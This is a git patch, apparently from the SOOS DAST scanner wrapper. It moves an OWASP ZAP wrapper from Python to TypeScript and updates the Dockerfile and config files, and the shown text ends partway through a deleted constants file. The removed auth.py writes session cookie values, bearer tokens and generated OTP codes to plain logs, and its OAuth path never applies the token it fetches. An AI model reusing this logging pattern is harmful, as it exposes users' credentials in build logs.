From cb429b4b98503bbf6f1cdb1fdc48be7d641926e8 Mon Sep 17 00:00:00 2001
From: SOOS-JAlvarez <jalvarez@soos.io>
Date: Fri, 3 Nov 2023 10:30:01 -0300
Subject: [PATCH 01/26] PA-11335 Rewrite of Dast wrapper on typescript/auth
 cleanup

---
 .gitignore                                    |  230 +--
 .prettierrc                                   |    6 +
 .vscode/settings.json                         |   19 +
 Dockerfile                                    |   72 +-
 config-example.yml                            |   15 -
 helpers/__init__.py                           |    0
 helpers/auth.py                               |  363 -----
 helpers/constants.py                          |   78 -
 helpers/utils.py                              |  246 ----
 main.py                                       | 1258 -----------------
 package-lock.json                             |  221 +++
 package.json                                  |   43 +
 scripts/blindxss.js                           |   74 -
 scripts/httpsender/request_cookies.js         |   24 -
 src/env.d.ts                                  |    7 +
 src/hooks/helpers/auth.py                     |  382 +++++
 {helpers => src/hooks/helpers}/blindxss.py    |    7 +-
 .../hooks/helpers}/browserstorage.py          |    0
 .../hooks/helpers}/configuration.py           |   12 +-
 src/hooks/helpers/constants.py                |   33 +
 .../hooks/helpers}/custom_cookies.py          |    6 +-
 .../hooks/helpers}/custom_headers.py          |    4 +-
 src/hooks/helpers/globals.py                  |    6 +
 {helpers => src/hooks/helpers}/log.py         |   25 +-
 .../hooks/helpers}/requestheaders.py          |    0
 src/hooks/helpers/utils.py                    |   71 +
 {model => src/hooks/model}/log_level.py       |    2 +-
 .../hooks/model}/target_availability_check.py |    0
 .../hooks/requirements.txt                    |    5 +-
 .../hooks/soos_zap_hook.py                    |   26 +-
 src/index.ts                                  |  544 +++++++
 .../traditional-json-headers/report.json      |    0
 .../traditional-json-headers/template.yaml    |    0
 .../reports}/traditional-json/report.json     |    0
 .../reports}/traditional-json/template.yaml   |    0
 src/utils/Logger.ts                           |   94 ++
 src/utils/ZapCommandGenerator.ts              |   99 ++
 src/utils/constants.ts                        |   30 +
 src/utils/enums.ts                            |   47 +
 src/utils/utilities.ts                        |  109 ++
 tests/tests.py                                |   42 -
 tsconfig.json                                 |   19 +
 42 files changed, 1822 insertions(+), 2397 deletions(-)
 create mode 100644 .prettierrc
 create mode 100644 .vscode/settings.json
 delete mode 100644 config-example.yml
 delete mode 100644 helpers/__init__.py
 delete mode 100644 helpers/auth.py
 delete mode 100644 helpers/constants.py
 delete mode 100644 helpers/utils.py
 delete mode 100644 main.py
 create mode 100644 package-lock.json
 create mode 100644 package.json
 delete mode 100644 scripts/blindxss.js
 delete mode 100644 scripts/httpsender/request_cookies.js
 create mode 100644 src/env.d.ts
 create mode 100644 src/hooks/helpers/auth.py
 rename {helpers => src/hooks/helpers}/blindxss.py (91%)
 rename {helpers => src/hooks/helpers}/browserstorage.py (100%)
 rename {helpers => src/hooks/helpers}/configuration.py (92%)
 create mode 100644 src/hooks/helpers/constants.py
 rename {helpers => src/hooks/helpers}/custom_cookies.py (81%)
 rename {helpers => src/hooks/helpers}/custom_headers.py (84%)
 create mode 100644 src/hooks/helpers/globals.py
 rename {helpers => src/hooks/helpers}/log.py (72%)
 rename {helpers => src/hooks/helpers}/requestheaders.py (100%)
 create mode 100644 src/hooks/helpers/utils.py
 rename {model => src/hooks/model}/log_level.py (90%)
 rename {model => src/hooks/model}/target_availability_check.py (100%)
 rename requirements.txt => src/hooks/requirements.txt (56%)
 rename hooks/soos_dast_hook.py => src/hooks/soos_zap_hook.py (74%)
 create mode 100644 src/index.ts
 rename {reports => src/reports}/traditional-json-headers/report.json (100%)
 rename {reports => src/reports}/traditional-json-headers/template.yaml (100%)
 rename {reports => src/reports}/traditional-json/report.json (100%)
 rename {reports => src/reports}/traditional-json/template.yaml (100%)
 create mode 100644 src/utils/Logger.ts
 create mode 100644 src/utils/ZapCommandGenerator.ts
 create mode 100644 src/utils/constants.ts
 create mode 100644 src/utils/enums.ts
 create mode 100644 src/utils/utilities.ts
 delete mode 100644 tests/tests.py
 create mode 100644 tsconfig.json

diff --git a/.gitignore b/.gitignore
index 5318f5b..8225baa 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,228 +1,2 @@
-.DS_Store
-
-### Python template
-# Byte-compiled / optimized / DLL files
-__pycache__/
-*.py[cod]
-*$py.class
-
-# C extensions
-*.so
-
-# Distribution / packaging
-.Python
-build/
-develop-eggs/
-dist/
-downloads/
-eggs/
-.eggs/
-lib/
-lib64/
-parts/
-sdist/
-var/
-wheels/
-share/python-wheels/
-*.egg-info/
-.installed.cfg
-*.egg
-MANIFEST
-
-# PyInstaller
-#  Usually these files are written by a python script from a template
-#  before PyInstaller builds the exe, so as to inject date/other infos into it.
-*.manifest
-*.spec
-
-# Installer logs
-pip-log.txt
-pip-delete-this-directory.txt
-
-# Unit test / coverage reports
-htmlcov/
-.tox/
-.nox/
-.coverage
-.coverage.*
-.cache
-nosetests.xml
-coverage.xml
-*.cover
-*.py,cover
-.hypothesis/
-.pytest_cache/
-cover/
-
-# Translations
-*.mo
-*.pot
-
-# Django stuff:
-*.log
-local_settings.py
-db.sqlite3
-db.sqlite3-journal
-
-# Flask stuff:
-instance/
-.webassets-cache
-
-# Scrapy stuff:
-.scrapy
-
-# Sphinx documentation
-docs/_build/
-
-# PyBuilder
-.pybuilder/
-target/
-
-# Jupyter Notebook
-.ipynb_checkpoints
-
-# IPython
-profile_default/
-ipython_config.py
-
-# pyenv
-#   For a library or package, you might want to ignore these files since the code is
-#   intended to run in multiple environments; otherwise, check them in:
-# .python-version
-
-# pipenv
-#   According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
-#   However, in case of collaboration, if having platform-specific dependencies or dependencies
-#   having no cross-platform support, pipenv may install dependencies that don't work, or not
-#   install all needed dependencies.
-#Pipfile.lock
-
-# PEP 582; used by e.g. github.com/David-OConnor/pyflow
-__pypackages__/
-
-# Celery stuff
-celerybeat-schedule
-celerybeat.pid
-
-# SageMath parsed files
-*.sage.py
-
-# Environments
-.env
-.venv
-env/
-venv/
-ENV/
-env.bak/
-venv.bak/
-
-# Spyder project settings
-.spyderproject
-.spyproject
-
-# Rope project settings
-.ropeproject
-
-# mkdocs documentation
-/site
-
-# mypy
-.mypy_cache/
-.dmypy.json
-dmypy.json
-
-# Pyre type checker
-.pyre/
-
-# pytype static type analyzer
-.pytype/
-
-# Cython debug symbols
-cython_debug/
-
-### JetBrains template
-# Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio, WebStorm and Rider
-# Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839
-
-.idea
-
-# User-specific stuff
-.idea/**/workspace.xml
-.idea/**/tasks.xml
-.idea/**/usage.statistics.xml
-.idea/**/dictionaries
-.idea/**/shelf
-
-# Generated files
-.idea/**/contentModel.xml
-
-# Sensitive or high-churn files
-.idea/**/dataSources/
-.idea/**/dataSources.ids
-.idea/**/dataSources.local.xml
-.idea/**/sqlDataSources.xml
-.idea/**/dynamic.xml
-.idea/**/uiDesigner.xml
-.idea/**/dbnavigator.xml
-
-# Gradle
-.idea/**/gradle.xml
-.idea/**/libraries
-
-# Gradle and Maven with auto-import
-# When using Gradle or Maven with auto-import, you should exclude module files,
-# since they will be recreated, and may cause churn.  Uncomment if using
-# auto-import.
-# .idea/artifacts
-# .idea/compiler.xml
-# .idea/jarRepositories.xml
-# .idea/modules.xml
-# .idea/*.iml
-# .idea/modules
-# *.iml
-# *.ipr
-
-# CMake
-cmake-build-*/
-
-# Mongo Explorer plugin
-.idea/**/mongoSettings.xml
-
-# File-based project format
-*.iws
-
-# IntelliJ
-out/
-
-# mpeltonen/sbt-idea plugin
-.idea_modules/
-
-# JIRA plugin
-atlassian-ide-plugin.xml
-
-# Cursive Clojure plugin
-.idea/replstate.xml
-
-# Crashlytics plugin (for Android Studio and IntelliJ)
-com_crashlytics_export_strings.xml
-crashlytics.properties
-crashlytics-build.properties
-fabric.properties
-
-# Editor-based Rest Client
-.idea/httpRequests
-
-# Android studio 3.1+ serialized cache file
-.idea/caches/build_file_checksums.ser
-
-### VisualStudioCode template
-.vscode/*
-!.vscode/settings.json
-!.vscode/tasks.json
-!.vscode/launch.json
-!.vscode/extensions.json
-*.code-workspace
-
-# Local History for Visual Studio Code
-.history/
-
+/node_modules
+/dist
diff --git a/.prettierrc b/.prettierrc
new file mode 100644
index 0000000..1fc490c
--- /dev/null
+++ b/.prettierrc
@@ -0,0 +1,6 @@
+{
+  "parser": "typescript",
+  "printWidth": 100,
+  "quoteProps": "consistent",
+  "endOfLine": "auto"
+}
diff --git a/.vscode/settings.json b/.vscode/settings.json
new file mode 100644
index 0000000..9db20b3
--- /dev/null
+++ b/.vscode/settings.json
@@ -0,0 +1,19 @@
+{
+    "editor.tabSize": 2,
+    "editor.formatOnSave": true,
+    "editor.defaultFormatter": "esbenp.prettier-vscode",
+    "prettier.configPath": "./.prettierrc",
+    "cSpell.words": [
+      "apiscan",
+      "DAST",
+      "fullscan",
+      "httpsender",
+      "Levelkey",
+      "nargs",
+      "SARIF",
+      "SOOS",
+      "SOOSDAST",
+      "SPIDERED"
+    ],
+    "sarif-viewer.connectToGithubCodeScanning": "off",
+  }
\ No newline at end of file
diff --git a/Dockerfile b/Dockerfile
index 769b070..f54baa1 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -1,30 +1,39 @@
-# if the image or tag changes, make sure to update the scan structure tool name and version
 FROM soosio/zap2docker-soos as base
 
 USER root
 
-COPY ./main.py ./requirements.txt ./VERSION.txt ./
-COPY ./helpers helpers/
-COPY ./hooks hooks/
-COPY ./model model/
-COPY ./scripts/httpsender /home/zap/.ZAP/scripts/scripts/httpsender/
-RUN chmod 777 /home/zap/.ZAP/scripts/scripts/httpsender/
+# Install nodejs version based on NODE_MAJOR
+ENV NODE_MAJOR 18
+RUN apt-get update
+RUN apt-get install -y ca-certificates curl gnupg
+RUN mkdir -p /etc/apt/keyrings
+RUN curl -fsSL https://deb.nodesource.com/gpgkey/nodesource-repo.gpg.key | gpg --dearmor -o /etc/apt/keyrings/nodesource.gpg
+RUN echo "deb [signed-by=/etc/apt/keyrings/nodesource.gpg] https://deb.nodesource.com/node_${NODE_MAJOR}.x nodistro main" | tee /etc/apt/sources.list.d/nodesource.list
+RUN apt-get update
+RUN apt-get install -y nodejs
 
-COPY ./reports/traditional-json /zap/reports/traditional-json
-COPY ./reports/traditional-json-headers /zap/reports/traditional-json-headers
-RUN chmod -R 444 /zap/reports/traditional-json
-RUN chmod -R 444 /zap/reports/traditional-json-headers
+COPY ./src/ ./src/
+COPY ./tsconfig.json ./
+COPY ./package.json ./
 
-RUN pip3 install -r requirements.txt && mkdir /zap/wrk && cd /opt \
-	&& wget -qO- -O geckodriver.tar.gz https://github.com/mozilla/geckodriver/releases/download/v0.30.0/geckodriver-v0.30.0-linux64.tar.gz \
-	&& tar -xvzf geckodriver.tar.gz \
-	&& chmod +x geckodriver \
-	&& ln -s /opt/geckodriver /usr/bin/geckodriver \
-	&& export PATH=$PATH:/usr/bin/geckodriver
+RUN pip3 install -r ./src/hooks/requirements.txt
 
-# Set up the Chrome PPA
-RUN wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | apt-key add -
-RUN echo "deb http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list
+RUN mkdir /zap/wrk && cd /opt \
+    && wget -qO- -O geckodriver.tar.gz https://github.com/mozilla/geckodriver/releases/download/v0.30.0/geckodriver-v0.30.0-linux64.tar.gz \
+    && tar -xvzf geckodriver.tar.gz \
+    && chmod +x geckodriver \
+    && ln -s /opt/geckodriver /usr/bin/geckodriver \
+    && export PATH=$PATH:/usr/bin/geckodriver
+
+RUN cd /zap/plugin && \
+	rm -rf ascanrules-* && wget https://github.com/zaproxy/zap-extensions/releases/download/ascanrules-v49/ascanrules-release-49.zap && \
+    rm -rf ascanrulesBeta-* && wget https://github.com/zaproxy/zap-extensions/releases/download/ascanrulesBeta-v44/ascanrulesBeta-beta-44.zap && \
+	rm -rf commonlib-* && wget https://github.com/zaproxy/zap-extensions/releases/download/commonlib-v1.12.0/commonlib-release-1.12.0.zap && \
+	rm -rf network-* && wget https://github.com/zaproxy/zap-extensions/releases/download/network-v0.6.0/network-beta-0.6.0.zap && \
+	rm -rf oast-* && wget https://github.com/zaproxy/zap-extensions/releases/download/oast-v0.14.0/oast-beta-0.14.0.zap && \
+	rm -rf pscanrules-* && wget https://github.com/zaproxy/zap-extensions/releases/download/pscanrules-v44/pscanrules-release-44.zap && \
+    rm -rf pscanrulesBeta-* && wget https://github.com/zaproxy/zap-extensions/releases/download/pscanrulesBeta-v31/pscanrulesBeta-beta-31.zap && \
+	chown -R zap:zap /zap
 
 # Set up Chrome version to be used
 ARG CHROME_VERSION="114.0.5735.133-1"
@@ -47,22 +56,13 @@ RUN unzip $CHROMEDRIVER_DIR/chromedriver* -d $CHROMEDRIVER_DIR
 # Put Chromedriver into the PATH
 ENV PATH $CHROMEDRIVER_DIR:$PATH
 
-RUN cd /zap/plugin && \
-	rm -rf ascanrules-* && wget https://github.com/zaproxy/zap-extensions/releases/download/ascanrules-v49/ascanrules-release-49.zap && \
-    rm -rf ascanrulesBeta-* && wget https://github.com/zaproxy/zap-extensions/releases/download/ascanrulesBeta-v44/ascanrulesBeta-beta-44.zap && \
-	rm -rf commonlib-* && wget https://github.com/zaproxy/zap-extensions/releases/download/commonlib-v1.12.0/commonlib-release-1.12.0.zap && \
-	rm -rf network-* && wget https://github.com/zaproxy/zap-extensions/releases/download/network-v0.6.0/network-beta-0.6.0.zap && \
-	rm -rf oast-* && wget https://github.com/zaproxy/zap-extensions/releases/download/oast-v0.14.0/oast-beta-0.14.0.zap && \
-	rm -rf pscanrules-* && wget https://github.com/zaproxy/zap-extensions/releases/download/pscanrules-v44/pscanrules-release-44.zap && \
-    rm -rf pscanrulesBeta-* && wget https://github.com/zaproxy/zap-extensions/releases/download/pscanrulesBeta-v31/pscanrulesBeta-beta-31.zap && \
-	chown -R zap:zap /zap
-	
-
-FROM base as test
-COPY ./tests tests/
+COPY ./src/reports/traditional-json /zap/reports/traditional-json
+COPY ./src/reports/traditional-json-headers /zap/reports/traditional-json-headers
+RUN chmod -R 444 /zap/reports/traditional-json
+RUN chmod -R 444 /zap/reports/traditional-json-headers
 
-ENTRYPOINT ["python3", "-m", "unittest", "tests/tests.py"]
+RUN npm install
 
-FROM base as production
+RUN npm run build
 
-ENTRYPOINT ["python3", "main.py"]
+ENTRYPOINT ["node", "dist/index.js"]
\ No newline at end of file
diff --git a/config-example.yml b/config-example.yml
deleted file mode 100644
index a538e37..0000000
--- a/config-example.yml
+++ /dev/null
@@ -1,15 +0,0 @@
-config:
-  clientId: SOOS_CLIENT_ID
-  apiKey: SOOS_API_KEY
-  projectName: 'SOOS DAST Analysis'
-  scanMode: 'baseline'
-  failOnError: 'continue_on_error'
-  rules: ''
-  context:
-    file: ''
-    user: ''
-  apiURL: 'https://api.soos.io/api/'
-  debug: false
-  ajaxSpider: false
-  apiScan:
-    format: 'openapi'
diff --git a/helpers/__init__.py b/helpers/__init__.py
deleted file mode 100644
index e69de29..0000000
diff --git a/helpers/auth.py b/helpers/auth.py
deleted file mode 100644
index e6914ce..0000000
--- a/helpers/auth.py
+++ /dev/null
@@ -1,363 +0,0 @@
-from os import environ, pathsep
-from re import search
-from time import sleep
-from traceback import print_exc
-
-from pyotp import TOTP
-from requests import post
-from selenium import webdriver
-from selenium.webdriver.common.action_chains import ActionChains
-from selenium.common.exceptions import NoSuchElementException, TimeoutException
-from selenium.webdriver.common.by import By
-from selenium.webdriver.support import expected_conditions as EC
-from selenium.webdriver.support.ui import WebDriverWait
-from helpers.browserstorage import BrowserStorage
-from helpers.utils import array_to_dict, log
-from model.log_level import LogLevel
-
-
-class DASTAuth:
-    driver = None
-    config = None
-
-    def __init__(self, config=None):
-        self.config = config
-
-    def setup_context(self, zap, target):
-        # Set an X-Scanner header so requests can be identified in logs
-        zap.replacer.add_rule(description='Scanner', enabled=True, matchtype='REQ_HEADER',
-                              matchregex=False, matchstring='X-Scanner', replacement="ZAP")
-
-        context_name = 'ctx-zap-docker'
-        context_id = zap.context.new_context(context_name)
-
-        import zap_common
-        zap_common.context_name = context_name
-        zap_common.context_id = context_id
-
-        # include everything below the target
-        self.config.auth_include_urls.append(target + '.*')
-
-        # include additional url's
-        for include in self.config.auth_include_urls:
-            zap.context.include_in_context(context_name, include)
-            log(f"Included {include}")
-
-        # exclude all urls that end the authenticated session
-        if len(self.config.auth_exclude_urls) == 0:
-            self.config.auth_exclude_urls.append('.*logout.*')
-            self.config.auth_exclude_urls.append('.*uitloggen.*')
-            self.config.auth_exclude_urls.append('.*afmelden.*')
-            self.config.auth_exclude_urls.append('.*signout.*')
-
-        for exclude in self.config.auth_exclude_urls:
-            zap.context.exclude_from_context(context_name, exclude)
-            log(f"Excluded {exclude}")
-
-    def setup_webdriver(self):
-        log('Start webdriver')
-
-        options = webdriver.ChromeOptions()
-        if not self.config.auth_display:
-            options.add_argument('--headless')
-        options.add_argument('--ignore-certificate-errors')
-        options.add_argument('--no-sandbox')
-        options.add_argument('--disable-dev-shm-usage')
-        # NOTE this is needed for the chromedriver path to be found on github actions, where the path is overridden before execution
-        if environ['CHROMEDRIVER_DIR'] not in environ['PATH']:
-            log(f"adding {environ['CHROMEDRIVER_DIR']} to path {environ['PATH']}")
-            environ["PATH"] += pathsep + environ['CHROMEDRIVER_DIR']	
-
-        self.driver = webdriver.Chrome(options=options)
-        self.driver.set_window_size(1920, 1080)
-        self.driver.maximize_window()
-
-    def authenticate(self, zap, target):
-        try:
-            # setup the zap context
-            if zap is not None:
-                self.setup_context(zap, target)
-
-            # perform authentication using selenium
-            if self.config.auth_login_url:
-                # setup the webdriver
-                self.setup_webdriver()
-
-                # login to the application
-                self.login()
-
-                # find session cookies or tokens and set them in ZAP
-                self.set_authentication(zap, target)
-            # perform authentication using a provided Bearer token
-            elif self.config.auth_bearer_token:
-                self.add_authorization_header(
-                    zap, f"Bearer {self.config.auth_bearer_token}")
-            # perform authentication using a simple token endpoint
-            elif self.config.auth_token_endpoint:
-                self.login_from_token_endpoint(zap)
-            # perform authentication to url that grant access_token for oauth
-            elif self.config.oauth_token_url:
-                self.login_from_oauth_token_url(zap)
-            else:
-                log(
-                    'No login URL, Token Endpoint or Bearer token provided - skipping authentication',
-                    log_level=LogLevel.WARN
-                )
-
-        except Exception:
-            log(f"error in authenticate: {print_exc()}", log_level=LogLevel.ERROR)
-        finally:
-            self.cleanup()
-
-    def set_authentication(self, zap, target):
-        log('Finding authentication cookies')
-        # Create an empty session for session cookies
-        if zap is not None:
-            zap.httpsessions.add_session_token(target, 'session_token')
-            zap.httpsessions.create_empty_session(target, 'auth-session')
-
-        # add all found cookies as session cookies
-        for cookie in self.driver.get_cookies():
-            if zap is not None:
-                zap.httpsessions.set_session_token_value(
-                    target, 'auth-session', cookie['name'], cookie['value'])
-            log(f"Cookie added: {cookie['name']}={cookie['value']}")
-
-        # add token from cookies if exists
-        self.add_token_from_cookie(zap, self.driver.get_cookies())
-
-        # Mark the session as active
-        if zap is not None:
-            zap.httpsessions.set_active_session(target, 'auth-session')
-            log(f"Active session: {zap.httpsessions.active_session(target)}")
-
-        log('Finding authentication headers')
-
-        # try to find JWT tokens in Local Storage and Session Storage and add them as Authorization header
-        localStorage = BrowserStorage(self.driver, 'localStorage')
-        sessionStorage = BrowserStorage(self.driver, 'sessionStorage')
-        self.add_token_from_browser_storage(zap, localStorage)
-        self.add_token_from_browser_storage(zap, sessionStorage)
-
-    def add_token_from_browser_storage(self, zap, browserStorage):
-        for key in browserStorage:
-            log(f"Found key: {key}")
-            match = search('(eyJ[^"]*)', browserStorage.get(key))
-            if match:
-                auth_header = "Bearer " + match.group()
-                self.add_authorization_header(zap, auth_header)
-
-    def add_token_from_cookie(self, zap, cookies):
-        for cookie in cookies:
-            if cookie['name'] == 'token':
-                auth_header = "Bearer " + cookie['value']
-                self.add_authorization_header(zap, auth_header)
-        
-
-    def login_from_token_endpoint(self, zap):
-        log('Fetching authentication token from endpoint')
-
-        response = post(self.config.auth_token_endpoint, data={
-            'username': self.config.auth_username, 'password': self.config.auth_password})
-        data = response.json()
-        auth_header = None
-
-        if "token" in data:
-            auth_header = f"Bearer {data['token']}"
-        elif "token_type" in data:
-            auth_header = f"{data['token_type']} {data['token_type']}"
-
-        if auth_header:
-            self.add_authorization_header(zap, auth_header)
-
-    def login_from_oauth_token_url(self, zap):
-        log('Making request to oauth token url')
-        body = array_to_dict(self.config.oauth_parameters)
-        response = post(self.config.oauth_token_url, data=body)
-        data = response.json()
-        auth_header = None
-        if "token" in data:
-            auth_header = f"Bearer {data['token']}"
-        elif "access_token" in data:
-            log("setting access_token from oauth response")
-            auth_header = f"Bearer {data['access_token']}"
-
-    def add_authorization_header(self, zap, auth_token):
-        if zap is not None:
-            zap.replacer.add_rule(description='AuthHeader', enabled=True, matchtype='REQ_HEADER',
-                                  matchregex=False, matchstring='Authorization', replacement=auth_token)
-        log(f"Authorization header added: {auth_token}")
-
-    def login(self):
-        log(f"authenticate using webdriver against URL: {self.config.auth_login_url}")
-
-        self.driver.get(self.config.auth_login_url)
-        final_submit_button = self.config.auth_submit_field_name
-
-        # wait for the page to load
-        sleep(5)
-
-        log('automatically finding login elements')
-
-        username_element = None
-
-        # fill out the username field
-        if self.config.auth_username:
-            username_element = self.fill_username()
-
-        if self.config.auth_form_type == 'wait_for_password':
-            log(f"Waiting for {self.config.auth_password_field_name} element to load")
-            sleep(self.config.auth_delay_time)
-        
-        if self.config.auth_form_type == 'multi_page':
-            continue_button = self.find_element(self.config.auth_submit_field_name, "submit", "//*[@type='submit' or @type='button' or button]" )
-            actions = ActionChains(self.driver)
-            actions.move_to_element(continue_button).click().perform()
-            final_submit_button = self.config.auth_submit_second_field_name
-            log(f"Clicked the first submit element for multi page")
-            sleep(self.config.auth_delay_time)
-
-        # fill out the password field
-        if self.config.auth_password:
-            try:
-                self.fill_password()
-            except Exception:
-                log(
-                    'Did not find the password field - clicking Next button and trying again', log_level=LogLevel.WARN)
-
-                # if the password field was not found, we probably need to submit to go to the password page
-                # login flow: username -> next -> password -> submit
-                self.fill_password()
-
-        # fill out the OTP field
-        if self.config.auth_otp_secret:
-            try:
-                self.fill_otp()
-            except Exception:
-                log(
-                    'Did not find the OTP field - clicking Next button and trying again', log_level=LogLevel.WARN)
-
-                # if the OTP field was not found, we probably need to submit to go to the OTP page
-                # login flow: username -> next -> password -> next -> otp -> submit
-                self.submit_form(self.config.auth_submit_action,
-                                 final_submit_button, self.config.auth_password_field_name)
-                self.fill_otp()
-
-        # submit
-        self.submit_form(self.config.auth_submit_action,
-                        final_submit_button, self.config.auth_password_field_name)
-
-        # wait for the page to load
-        if self.config.auth_check_element:
-            try:
-                log('Check element')
-                WebDriverWait(self.driver, self.config.auth_check_delay).until(
-                    EC.presence_of_element_located((By.XPATH, self.config.auth_check_element)))
-            except TimeoutException:
-                log('Check element timeout')
-        else:
-            sleep(self.config.auth_check_delay)
-
-    def submit_form(self, submit_action, submit_field_name, password_field_name):
-        if submit_action == "click":
-            element = self.find_element(
-                submit_field_name, "submit", "//*[@type='submit' or @type='button' or button]")
-            actions = ActionChains(self.driver)
-            actions.move_to_element(element).click().perform()
-            log(f"Clicked the {submit_field_name} element")
-        else:
-            self.find_element(password_field_name,"password","//input[@type='password' or contains(@name,'ass')]").submit()
-            log('Submitted the form')
-
-    def fill_username(self):
-        return self.find_and_fill_element(self.config.auth_username,
-                                          self.config.auth_username_field_name,
-                                          "input",
-                                          "(//input[((@type='text' or @type='email') and contains(@name,'ser')) or (@type='text' or @type='email')])[1]")
-
-    def fill_password(self):
-        return self.find_and_fill_element(self.config.auth_password,
-                                          self.config.auth_password_field_name,
-                                          "password",
-                                          "//input[@type='password' or contains(@name,'ass')]")
-
-    def fill_otp(self):
-        totp = TOTP(self.config.auth_otp_secret)
-        otp = totp.now()
-
-        log(f"Generated OTP: {otp}")
-
-        return self.find_and_fill_element(otp,
-                                          self.config.auth_otp_field_name,
-                                          "input",
-                                          "//input[@type='text' and (contains(@id,'otp') or contains(@name,'otp'))]")
-
-    def find_and_fill_element(self, value, name, element_type, xpath):
-        element = self.find_element(name, element_type, xpath)
-        element.clear()
-        element.send_keys(value)
-        log(f"Filled the {name} element")
-
-        return element
-
-    # 1. Find by ID attribute (case insensitive)
-    # 2. Find by Name attribute (case insensitive)
-    # 3. Find by xpath
-    # 4. Find by the default xpath if all above fail
-    def find_element(self, name_or_id_or_xpath, element_type, default_xpath):
-        element = None
-        log(f"Trying to find element {name_or_id_or_xpath}")
-
-        if name_or_id_or_xpath:
-            try:
-                path = self.build_xpath(
-                    name_or_id_or_xpath, "id", element_type)
-                element = self.driver.find_element_by_xpath(path)
-                log(f"Found element {name_or_id_or_xpath} by id")
-            except NoSuchElementException:
-                try:
-                    path = self.build_xpath(
-                        name_or_id_or_xpath, "name", element_type)
-                    element = self.driver.find_element_by_xpath(path)
-                    log(f"Found element {name_or_id_or_xpath} by name")
-                except NoSuchElementException:
-                    try:
-                        element = self.driver.find_element_by_xpath(
-                            name_or_id_or_xpath)
-                        log(
-                            f"Found element {name_or_id_or_xpath} by xpath (name)")
-                    except NoSuchElementException:
-                        try:
-                            element = self.driver.find_element_by_xpath(
-                                default_xpath)
-                            log(
-                                f"Found element {default_xpath} by default xpath")
-                        except NoSuchElementException:
-                            log(
-                                f"Failed to find the element {name_or_id_or_xpath}")
-
-        return element
-
-    def build_xpath(self, name, find_by, element_type):
-        xpath = "translate(@{0}, 'ABCDEFGHIJKLMNOPQRSTUVWXYZ','abcdefghijklmnopqrstuvwxyz')='{1}'".format(
-            find_by, name.lower())
-
-        if element_type == 'input':
-            xpath = "//input[({0}) and ({1})]".format(xpath,
-                                                      "@type='text' or @type='email' or @type='number' or not(@type)")
-        elif element_type == 'password':
-            xpath = "//input[({0}) and ({1})]".format(xpath,
-                                                      "@type='text' or @type='password' or not(@type)")
-        elif element_type == 'submit':
-            xpath = "//*[({0}) and ({1})]".format(xpath,
-                                                  "@type='submit' or @type='button' or button")
-        else:
-            xpath = "//*[{0}]".format(xpath)
-
-        log(f"Built xpath: {xpath}")
-
-        return xpath
-
-    def cleanup(self):
-        if self.driver:
-            self.driver.quit()
diff --git a/helpers/constants.py b/helpers/constants.py
deleted file mode 100644
index b4af433..0000000
--- a/helpers/constants.py
+++ /dev/null
@@ -1,78 +0,0 @@
-DEFAULT_API_URL: str = "https://api.soos.io/api/"
-HEADER_SOOS_API_KEY: str = "x-soos-apikey"
-HEADER_CONTENT_TYPE: str = "Content-Type"
-JSON_HEADER_CONTENT_TYPE: str = "application/json"
-MULTIPART_HEADER_CONTENT_TYPE: str = "multipart/form-data"
-MAX_RETRY_COUNT: int = 3
-SOOS_CLIENT_ID_KEY: str = "SOOS_CLIENT_ID"
-SOOS_API_KEY: str = "SOOS_API_KEY"
-DEFAULT_INTEGRATION_NAME: str = "None"
-DEFAULT_INTEGRATION_TYPE: str = "Script"
-DEFAULT_DAST_TOOL: str = "zap"
-DEFAULT_DAST_TOOL_VERSION: str = "latest"
-SERVER_ERROR_CODES = range(500, 599)
-RETRY_DELAY = 3  # seconds
-REQUEST_TIMEOUT = 10  # seconds
-EMPTY_STRING = ''
-FAIL_THE_BUILD = "fail_the_build"
-CONTINUE_ON_FAILURE = "continue_on_failure"
-AUTH_DELAY_TIME = 5  # seconds
-
-# SCAN MODES
-BASELINE = 'baseline'
-FULL_SCAN = 'fullscan'
-API_SCAN = 'apiscan'
-
-# URL PLACEHOLDERS
-BASE_URI_PLACEHOLDER = "{soos_base_uri}"
-CLIENT_ID_PLACEHOLDER = "{soos_client_id}"
-PROJECT_ID_PLACEHOLDER = "{soos_project_id}"
-DAST_TOOL_PLACEHOLDER = "{soos_dast_tool}"
-ANALYSIS_ID_PLACEHOLDER = "{soos_analysis_id}"
-
-# FILE PROCESSING
-FILE_READ_MODE = "r"
-FILE_WRITE_MODE = "x"
-UTF_8_ENCODING = "utf-8"
-
-# OWASP ZAP Constants - for command line options, see https://www.zaproxy.org/docs/docker/full-scan/
-REPORT_SCAN_RESULT_FILENAME = "report.json"
-REPORT_SCAN_RESULT_FILE = "/zap/wrk/" + REPORT_SCAN_RESULT_FILENAME
-PY_CMD = "python3"
-BASE_LINE_SCRIPT = "/zap/zap-baseline.py"
-FULL_SCAN_SCRIPT = "/zap/zap-full-scan.py"
-API_SCAN_SCRIPT = "/zap/zap-api-scan.py"
-CONFIG_FILE_FOLDER = "/zap/config/"
-ZAP_TARGET_URL_OPTION = "-t"
-ZAP_MINIMUM_LEVEL_OPTION = "-l"
-ZAP_RULES_FILE_OPTION = "-c"
-ZAP_CONTEXT_FILE_OPTION = "-n"
-ZAP_SPIDER_MINUTES_OPTION = "-m"
-ZAP_DEBUG_OPTION = "-d"
-ZAP_AJAX_SPIDER_OPTION = "-j"
-ZAP_FORMAT_OPTION = "-f"
-ZAP_JSON_REPORT_OPTION = "-J"
-ZAP_OPTIONS = "-z"
-ZAP_HOOK_OPTION = "--hook"
-# NOTE: ZAP, when performing a 'fullscan', creates a policy called "Default Policy" - it's needed to specify that name in order to change the scan rules.
-ZAP_ACTIVE_SCAN_POLICY_NAME = "Default Policy"
-URI_START_DAST_ANALYSIS_TEMPLATE = (
-    "{soos_base_uri}clients/{soos_client_id}/dast-tools/{soos_dast_tool}/analysis"
-)
-URI_START_DAST_ANALYSIS_TEMPLATE_v2 = (
-    "{soos_base_uri}clients/{soos_client_id}/scan-types/dast/scans"
-)
